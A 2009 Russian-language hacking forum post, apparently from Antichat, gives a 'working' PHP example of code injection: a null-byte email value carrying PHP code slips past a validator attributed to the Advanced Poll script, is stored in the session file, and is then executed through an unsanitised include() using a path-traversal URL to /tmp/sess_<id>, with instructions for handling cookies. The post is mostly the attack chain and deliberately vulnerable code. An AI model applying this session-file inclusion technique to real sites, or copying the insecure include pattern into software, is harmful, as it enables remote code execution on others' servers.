Форум АНТИЧАТ - Инъекция кода в mail()

#36

23.05.2009, 21:57

PaCo

Постоянный

Регистрация: 06.02.2008

Сообщений: 494

Провел на форуме:
1754802

Репутация: 380

Вот тебе РАБОЧИЙ пример:

PHP код:


		
			
<?php

session_start();

$_POSTT['mail']= "mail@mail.ru" . chr(00) . '<?php phpinfo(); ?>' ;//что бы не писать форму





// Взято с реального двига - advanced poll - include/class_pollcomment.php - 295 стр. 

if (!eregi("^[_a-z0-9-]+(\\.[_a-z0-9-]+)*@([0-9a-z][0-9a-z-]*[0-9a-z]\\.)+[0-9a-z]{1,6}$", $_POSTT['mail']) ) {

            $_POSTT['mail'] = '';

        }

//echo $_POSTT['mail'];        



$to      = $_POSTT['mail'];

$subject = 'the subject';

$message = 'hello';

$headers = 'From: webmaster@example.com' . "\r\n" .

    'Reply-To: webmaster@example.com' . "\r\n" .

    'X-Mailer: PHP/' . phpversion();



if(mail($to, $subject, $message, $headers)){//

  $_SESSION['mail']=$_POSTT['mail'];;

}

 //LFI тоже взято с одного самопального движка 

$page=@file_exists($_GET['page']) ? $_GET['page'] : '';

if(!empty($page)){

 include($page);

}

Далее смотришь в кукисах(в адресной строке) свой индентификатор сессии(если ты такой знаток как пишешь то разберешься что это), далее чистишь кукисы или заходишь с другова браузера(важно что бы твой идентификатор сессии не передовался иначе инклюд не выйдет, по крайне мере у меня из за этого не выходил нигде где бы я ни пробывал, может это связано с тем php производит запись в файл сессии и и инклюд не происходит):

имя_скрипта.php?page=/../../../../../../../TMP/sess_тут_индетификатор_сесси� �_из_кукисов_или_из_адресной _строки

Последний раз редактировалось PaCo; 24.05.2009 в 21:59..